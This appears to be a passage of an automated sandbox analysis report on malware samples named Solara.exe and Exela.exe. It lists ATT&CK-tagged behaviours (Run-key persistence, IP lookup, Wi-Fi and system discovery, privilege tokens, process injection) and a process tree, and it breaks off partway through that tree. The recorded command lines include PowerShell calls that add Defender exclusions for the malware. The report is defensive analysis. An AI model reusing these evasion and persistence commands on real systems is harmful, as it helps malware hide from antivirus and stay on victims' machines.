Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
123	ip-api.com
142	ip-api.com
159	ip-api.com
211	ip-api.com
228	ip-api.com
17	ip-api.com
104	ip-api.com
194	ip-api.com
67	ip-api.com
175	ip-api.com

Network Service Discovery 1 TTPs 21 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
456	cmd.exe
2372	ARP.EXE
3680	Process not Found
4008	Process not Found
3444	Process not Found
4388	ARP.EXE
4020	Process not Found
1008	Process not Found
3692	Process not Found
1688	Process not Found
4732	Process not Found
2656	ARP.EXE
1808	Process not Found
4900	Process not Found
1332	Process not Found
2752	cmd.exe
952	cmd.exe
4704	ARP.EXE
3624	cmd.exe
2168	cmd.exe
2012	Process not Found

Enumerates processes with tasklist 1 TTPs 54 IoCs

discovery

Process Discovery

T1057

pid	Process
4840	tasklist.exe
3716	tasklist.exe
924	tasklist.exe
4628	Process not Found
1984	Process not Found
660	Process not Found
208	tasklist.exe
4884	tasklist.exe
3044	Process not Found
2940	Process not Found
1460	Process not Found
2176	Process not Found
2520	tasklist.exe
4884	Process not Found
3944	tasklist.exe
4020	Process not Found
2072	tasklist.exe
4292	tasklist.exe
2592	tasklist.exe
3164	tasklist.exe
3032	Process not Found
3532	tasklist.exe
4848	tasklist.exe
2888	Process not Found
516	Process not Found
1456	Process not Found
2176	tasklist.exe
996	Process not Found
4908	Process not Found
3516	Process not Found
4124	Process not Found
4152	Process not Found
576	Process not Found
3484	Process not Found
3792	Process not Found
4528	Process not Found
4388	Process not Found
3348	tasklist.exe
2904	tasklist.exe
4636	tasklist.exe
5012	tasklist.exe
1036	tasklist.exe
1028	Process not Found
1880	tasklist.exe
3496	tasklist.exe
820	tasklist.exe
436	Process not Found
772	Process not Found
1840	Process not Found
3448	Process not Found
3368	tasklist.exe
4020	tasklist.exe
4628	Process not Found
4908	Process not Found

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3844	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cec-94.dat	upx
behavioral2/memory/4992-98-0x00007FF8CDAC0000-0x00007FF8CDF2E000-memory.dmp	upx
behavioral2/files/0x0007000000023ce4-106.dat	upx
behavioral2/memory/4992-131-0x00007FF8DEEE0000-0x00007FF8DEEED000-memory.dmp	upx
behavioral2/memory/4992-130-0x00007FF8DF040000-0x00007FF8DF059000-memory.dmp	upx
behavioral2/files/0x0007000000023ced-129.dat	upx
behavioral2/files/0x0007000000023cc1-128.dat	upx
behavioral2/files/0x0007000000023cc4-127.dat	upx
behavioral2/files/0x0007000000023cbd-143.dat	upx
behavioral2/memory/4992-147-0x00007FF8DC620000-0x00007FF8DC63F000-memory.dmp	upx
behavioral2/memory/4992-149-0x00007FF8C7DE0000-0x00007FF8C7F51000-memory.dmp	upx
behavioral2/memory/4992-152-0x00007FF8D5F10000-0x00007FF8D5F3E000-memory.dmp	upx
behavioral2/memory/4992-153-0x00007FF8C6220000-0x00007FF8C6595000-memory.dmp	upx
behavioral2/memory/4992-154-0x00007FF8CDAC0000-0x00007FF8CDF2E000-memory.dmp	upx
behavioral2/files/0x0007000000023ce3-151.dat	upx
behavioral2/files/0x0007000000023cc3-150.dat	upx
behavioral2/files/0x0007000000023cc2-146.dat	upx
behavioral2/memory/4992-145-0x00007FF8DDFE0000-0x00007FF8DE00D000-memory.dmp	upx
behavioral2/memory/4992-144-0x00007FF8DEB30000-0x00007FF8DEB49000-memory.dmp	upx
behavioral2/files/0x0007000000023cb8-142.dat	upx
behavioral2/files/0x0007000000023cee-148.dat	upx
behavioral2/files/0x0007000000023cc0-123.dat	upx
behavioral2/files/0x0007000000023cbf-122.dat	upx
behavioral2/files/0x0007000000023cbe-121.dat	upx
behavioral2/files/0x0007000000023cbc-119.dat	upx
behavioral2/files/0x0007000000023cbb-118.dat	upx
behavioral2/files/0x0007000000023cb9-117.dat	upx
behavioral2/files/0x0007000000023cb6-115.dat	upx
behavioral2/files/0x0007000000023cef-114.dat	upx
behavioral2/files/0x0007000000023cea-111.dat	upx
behavioral2/files/0x0007000000023ce5-110.dat	upx
behavioral2/files/0x0007000000023cba-104.dat	upx
behavioral2/memory/4992-108-0x00007FF8E3010000-0x00007FF8E301F000-memory.dmp	upx
behavioral2/memory/4992-107-0x00007FF8DF060000-0x00007FF8DF084000-memory.dmp	upx
behavioral2/memory/4992-158-0x00007FF8C8EF0000-0x00007FF8C8FA8000-memory.dmp	upx
behavioral2/files/0x0007000000023cf1-168.dat	upx
behavioral2/memory/4992-177-0x00007FF8DE730000-0x00007FF8DE74B000-memory.dmp	upx
behavioral2/memory/4992-176-0x00007FF8DE2C0000-0x00007FF8DE3D8000-memory.dmp	upx
behavioral2/files/0x0007000000023ce9-175.dat	upx
behavioral2/memory/4992-172-0x00007FF8DE750000-0x00007FF8DE772000-memory.dmp	upx
behavioral2/memory/4992-171-0x00007FF8DF040000-0x00007FF8DF059000-memory.dmp	upx
behavioral2/memory/4992-170-0x00007FF8DEB50000-0x00007FF8DEB64000-memory.dmp	upx
behavioral2/memory/4992-169-0x00007FF8DECE0000-0x00007FF8DECF4000-memory.dmp	upx
behavioral2/memory/4992-167-0x00007FF8DED00000-0x00007FF8DED10000-memory.dmp	upx
behavioral2/memory/4992-166-0x00007FF8DED10000-0x00007FF8DED25000-memory.dmp	upx
behavioral2/files/0x0007000000023ce7-163.dat	upx
behavioral2/memory/4992-157-0x00007FF8DF060000-0x00007FF8DF084000-memory.dmp	upx
behavioral2/files/0x0007000000023cc7-189.dat	upx
behavioral2/memory/4992-194-0x00007FF8CE470000-0x00007FF8CE4BD000-memory.dmp	upx
behavioral2/memory/4992-193-0x00007FF8DC620000-0x00007FF8DC63F000-memory.dmp	upx
behavioral2/files/0x0007000000023cc9-196.dat	upx
behavioral2/memory/4992-203-0x00007FF8D5F10000-0x00007FF8D5F3E000-memory.dmp	upx
behavioral2/memory/4992-202-0x00007FF8DEA20000-0x00007FF8DEA2A000-memory.dmp	upx
behavioral2/memory/4992-201-0x00007FF8DC240000-0x00007FF8DC25E000-memory.dmp	upx
behavioral2/memory/4992-200-0x00007FF8D5ED0000-0x00007FF8D5F02000-memory.dmp	upx
behavioral2/memory/4992-199-0x00007FF8DC600000-0x00007FF8DC611000-memory.dmp	upx
behavioral2/memory/4992-198-0x00007FF8C6220000-0x00007FF8C6595000-memory.dmp	upx
behavioral2/memory/4992-197-0x00007FF8C7DE0000-0x00007FF8C7F51000-memory.dmp	upx
behavioral2/memory/4992-192-0x00007FF8DE2A0000-0x00007FF8DE2B8000-memory.dmp	upx
behavioral2/files/0x0007000000023cc6-191.dat	upx
behavioral2/memory/4992-204-0x00007FF8C5800000-0x00007FF8C5FFB000-memory.dmp	upx
behavioral2/memory/4992-206-0x00007FF8D0CC0000-0x00007FF8D0CF7000-memory.dmp	upx
behavioral2/memory/4992-205-0x00007FF8C8EF0000-0x00007FF8C8FA8000-memory.dmp	upx
behavioral2/memory/1028-256-0x00007FF8CD650000-0x00007FF8CDABE000-memory.dmp	upx

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5100	sc.exe
4120	Process not Found
3532	Process not Found
4444	Process not Found
4304	Process not Found
2452	sc.exe
5036	sc.exe
3448	sc.exe
2316	Process not Found
5112	Process not Found

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0009000000023cb3-36.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	Process not Found
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 22 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4944	cmd.exe
464	netsh.exe
4624	netsh.exe
384	Process not Found
2872	Process not Found
3032	Process not Found
3816	cmd.exe
4860	cmd.exe
5108	cmd.exe
3320	Process not Found
1700	Process not Found
4704	netsh.exe
4776	cmd.exe
2460	Process not Found
2400	Process not Found
3532	Process not Found
3996	Process not Found
3716	netsh.exe
4624	netsh.exe
1988	Process not Found
3884	Process not Found
764	Process not Found

System Network Connections Discovery 1 TTPs 10 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
4652	Process not Found
1508	NETSTAT.EXE
784	NETSTAT.EXE
3600	Process not Found
2668	Process not Found
5076	Process not Found
1044	NETSTAT.EXE
4760	NETSTAT.EXE
1464	Process not Found
1704	Process not Found

Collects information from the system 1 TTPs 11 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
3456	WMIC.exe
1884	WMIC.exe
2288	Process not Found
2632	Process not Found
1336	Process not Found
560	Process not Found
4908	Process not Found
1624	WMIC.exe
4692	WMIC.exe
3156	WMIC.exe
3212	Process not Found

Detects videocard installed 1 TTPs 11 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3060	Process not Found
2332	WMIC.exe
2608	Process not Found
60	Process not Found
1900	WMIC.exe
1600	Process not Found
3892	Process not Found
3596	Process not Found
4064	WMIC.exe
3120	WMIC.exe
772	WMIC.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1044	NETSTAT.EXE
1496	ipconfig.exe
4760	NETSTAT.EXE
2540	ipconfig.exe
1464	Process not Found
3600	Process not Found
2760	Process not Found
2668	Process not Found
4652	Process not Found
1508	NETSTAT.EXE
880	Process not Found
1704	Process not Found
5076	Process not Found
5112	ipconfig.exe
4432	ipconfig.exe
784	NETSTAT.EXE
1792	Process not Found
1020	Process not Found
324	Process not Found
896	Process not Found

Gathers system information 1 TTPs 11 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4376	systeminfo.exe
3036	Process not Found
824	Process not Found
4420	Process not Found
1172	Process not Found
4656	systeminfo.exe
3224	systeminfo.exe
3884	systeminfo.exe
2720	systeminfo.exe
3216	Process not Found
4772	Process not Found

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1812	powershell.exe
1812	powershell.exe
3388	powershell.exe
3388	powershell.exe
1200	powershell.exe
1200	powershell.exe
4928	powershell.exe
4928	powershell.exe
1180	powershell.exe
1180	powershell.exe
4656	powershell.exe
4656	powershell.exe
4648	powershell.exe
4648	powershell.exe
2112	powershell.exe
2112	powershell.exe
3488	powershell.exe
2112	powershell.exe
3488	powershell.exe
3488	powershell.exe
604	powershell.exe
604	powershell.exe
4616	powershell.exe
4616	powershell.exe
3444	powershell.exe
3444	powershell.exe
3792	powershell.exe
3792	powershell.exe
3792	powershell.exe
4012	powershell.exe
4012	powershell.exe
3088	powershell.exe
3088	powershell.exe
3732	powershell.exe
3732	powershell.exe
3396	powershell.exe
3396	powershell.exe
4772	powershell.exe
4772	powershell.exe
4448	powershell.exe
4448	powershell.exe
1444	powershell.exe
1444	powershell.exe
5104	powershell.exe
5104	powershell.exe
2720	powershell.exe
2720	powershell.exe
3224	powershell.exe
3224	powershell.exe
2656	powershell.exe
2656	powershell.exe
4244	powershell.exe
4244	powershell.exe
5112	powershell.exe
5112	powershell.exe
3444	powershell.exe
3444	powershell.exe
512	powershell.exe
512	powershell.exe
4848	powershell.exe
4848	powershell.exe
2748	powershell.exe
2748	powershell.exe
4596	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeIncreaseQuotaPrivilege	4444	WMIC.exe
Token: SeSecurityPrivilege	4444	WMIC.exe
Token: SeTakeOwnershipPrivilege	4444	WMIC.exe
Token: SeLoadDriverPrivilege	4444	WMIC.exe
Token: SeSystemProfilePrivilege	4444	WMIC.exe
Token: SeSystemtimePrivilege	4444	WMIC.exe
Token: SeProfSingleProcessPrivilege	4444	WMIC.exe
Token: SeIncBasePriorityPrivilege	4444	WMIC.exe
Token: SeCreatePagefilePrivilege	4444	WMIC.exe
Token: SeBackupPrivilege	4444	WMIC.exe
Token: SeRestorePrivilege	4444	WMIC.exe
Token: SeShutdownPrivilege	4444	WMIC.exe
Token: SeDebugPrivilege	4444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4444	WMIC.exe
Token: SeRemoteShutdownPrivilege	4444	WMIC.exe
Token: SeUndockPrivilege	4444	WMIC.exe
Token: SeManageVolumePrivilege	4444	WMIC.exe
Token: 33	4444	WMIC.exe
Token: 34	4444	WMIC.exe
Token: 35	4444	WMIC.exe
Token: 36	4444	WMIC.exe
Token: SeDebugPrivilege	2520	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4064	WMIC.exe
Token: SeSecurityPrivilege	4064	WMIC.exe
Token: SeTakeOwnershipPrivilege	4064	WMIC.exe
Token: SeLoadDriverPrivilege	4064	WMIC.exe
Token: SeSystemProfilePrivilege	4064	WMIC.exe
Token: SeSystemtimePrivilege	4064	WMIC.exe
Token: SeProfSingleProcessPrivilege	4064	WMIC.exe
Token: SeIncBasePriorityPrivilege	4064	WMIC.exe
Token: SeCreatePagefilePrivilege	4064	WMIC.exe
Token: SeBackupPrivilege	4064	WMIC.exe
Token: SeRestorePrivilege	4064	WMIC.exe
Token: SeShutdownPrivilege	4064	WMIC.exe
Token: SeDebugPrivilege	4064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4064	WMIC.exe
Token: SeRemoteShutdownPrivilege	4064	WMIC.exe
Token: SeUndockPrivilege	4064	WMIC.exe
Token: SeManageVolumePrivilege	4064	WMIC.exe
Token: 33	4064	WMIC.exe
Token: 34	4064	WMIC.exe
Token: 35	4064	WMIC.exe
Token: 36	4064	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4444	WMIC.exe
Token: SeSecurityPrivilege	4444	WMIC.exe
Token: SeTakeOwnershipPrivilege	4444	WMIC.exe
Token: SeLoadDriverPrivilege	4444	WMIC.exe
Token: SeSystemProfilePrivilege	4444	WMIC.exe
Token: SeSystemtimePrivilege	4444	WMIC.exe
Token: SeProfSingleProcessPrivilege	4444	WMIC.exe
Token: SeIncBasePriorityPrivilege	4444	WMIC.exe
Token: SeCreatePagefilePrivilege	4444	WMIC.exe
Token: SeBackupPrivilege	4444	WMIC.exe
Token: SeRestorePrivilege	4444	WMIC.exe
Token: SeShutdownPrivilege	4444	WMIC.exe
Token: SeDebugPrivilege	4444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4444	WMIC.exe
Token: SeRemoteShutdownPrivilege	4444	WMIC.exe
Token: SeUndockPrivilege	4444	WMIC.exe
Token: SeManageVolumePrivilege	4444	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 1812	2376	Solara.exe	82
PID 2376 wrote to memory of 1812	2376	Solara.exe	82
PID 2376 wrote to memory of 1392	2376	Solara.exe	84
PID 2376 wrote to memory of 1392	2376	Solara.exe	84
PID 2376 wrote to memory of 3388	2376	Solara.exe	85
PID 2376 wrote to memory of 3388	2376	Solara.exe	85
PID 2376 wrote to memory of 2044	2376	Solara.exe	87
PID 2376 wrote to memory of 2044	2376	Solara.exe	87
PID 2044 wrote to memory of 4992	2044	Exela.exe	88
PID 2044 wrote to memory of 4992	2044	Exela.exe	88
PID 1392 wrote to memory of 1200	1392	Solara.exe	89
PID 1392 wrote to memory of 1200	1392	Solara.exe	89
PID 1392 wrote to memory of 4236	1392	Solara.exe	91
PID 1392 wrote to memory of 4236	1392	Solara.exe	91
PID 1392 wrote to memory of 4928	1392	Solara.exe	92
PID 1392 wrote to memory of 4928	1392	Solara.exe	92
PID 4992 wrote to memory of 4312	4992	Exela.exe	94
PID 4992 wrote to memory of 4312	4992	Exela.exe	94
PID 4992 wrote to memory of 3148	4992	Exela.exe	96
PID 4992 wrote to memory of 3148	4992	Exela.exe	96
PID 4992 wrote to memory of 3516	4992	Exela.exe	97
PID 4992 wrote to memory of 3516	4992	Exela.exe	97
PID 4992 wrote to memory of 4564	4992	Exela.exe	100
PID 4992 wrote to memory of 4564	4992	Exela.exe	100
PID 4992 wrote to memory of 3696	4992	Exela.exe	101
PID 4992 wrote to memory of 3696	4992	Exela.exe	101
PID 1392 wrote to memory of 4644	1392	Solara.exe	103
PID 1392 wrote to memory of 4644	1392	Solara.exe	103
PID 3516 wrote to memory of 4444	3516	cmd.exe	105
PID 3516 wrote to memory of 4444	3516	cmd.exe	105
PID 4644 wrote to memory of 1028	4644	Exela.exe	106
PID 4644 wrote to memory of 1028	4644	Exela.exe	106
PID 3696 wrote to memory of 2520	3696	cmd.exe	107
PID 3696 wrote to memory of 2520	3696	cmd.exe	107
PID 3148 wrote to memory of 4064	3148	cmd.exe	108
PID 3148 wrote to memory of 4064	3148	cmd.exe	108
PID 4236 wrote to memory of 1180	4236	Solara.exe	110
PID 4236 wrote to memory of 1180	4236	Solara.exe	110
PID 4992 wrote to memory of 4544	4992	Exela.exe	112
PID 4992 wrote to memory of 4544	4992	Exela.exe	112
PID 1028 wrote to memory of 1896	1028	Exela.exe	181
PID 1028 wrote to memory of 1896	1028	Exela.exe	181
PID 4544 wrote to memory of 3924	4544	cmd.exe	116
PID 4544 wrote to memory of 3924	4544	cmd.exe	116
PID 4992 wrote to memory of 4208	4992	Exela.exe	117
PID 4992 wrote to memory of 4208	4992	Exela.exe	117
PID 4992 wrote to memory of 4884	4992	Exela.exe	118
PID 4992 wrote to memory of 4884	4992	Exela.exe	118
PID 4236 wrote to memory of 1408	4236	Solara.exe	120
PID 4236 wrote to memory of 1408	4236	Solara.exe	120
PID 4236 wrote to memory of 4656	4236	Solara.exe	122
PID 4236 wrote to memory of 4656	4236	Solara.exe	122
PID 4208 wrote to memory of 3532	4208	cmd.exe	152
PID 4208 wrote to memory of 3532	4208	cmd.exe	152
PID 4884 wrote to memory of 1880	4884	cmd.exe	127
PID 4884 wrote to memory of 1880	4884	cmd.exe	127
PID 4236 wrote to memory of 3196	4236	Solara.exe	129
PID 4236 wrote to memory of 3196	4236	Solara.exe	129
PID 3196 wrote to memory of 2928	3196	Exela.exe	130
PID 3196 wrote to memory of 2928	3196	Exela.exe	130
PID 4992 wrote to memory of 3844	4992	Exela.exe	131
PID 4992 wrote to memory of 3844	4992	Exela.exe	131
PID 3844 wrote to memory of 952	3844	cmd.exe	133
PID 3844 wrote to memory of 952	3844	cmd.exe	133

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
952	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Solara.exe
C:\Users\Admin\AppData\Local\Temp\Solara.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"
1⤵
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Users\Admin\AppData\Local\Temp\Solara.exe
  "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1200
- - C:\Users\Admin\AppData\Local\Temp\Solara.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1180
  - - C:\Users\Admin\AppData\Local\Temp\Solara.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
      4⤵
      Adds Run key to start application
      PID:1408
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4648
    - - C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        5⤵
        
        PID:2748
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:604
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2876
      - C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        6⤵
        
        PID:5020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\Solara.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        7⤵
        Adds Run key to start application
        
        PID:4764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4012
        
        C:\Windows\System32\Conhost.exe
        
